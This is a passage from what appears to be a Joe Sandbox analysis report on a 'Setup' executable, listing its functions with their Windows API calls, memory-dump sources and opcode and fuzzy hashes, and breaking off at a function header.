                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                                                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                                                                                Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                                                                                Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                                                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                                                                                Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                                                                                Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                                                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                                                                                Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                                                                                Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
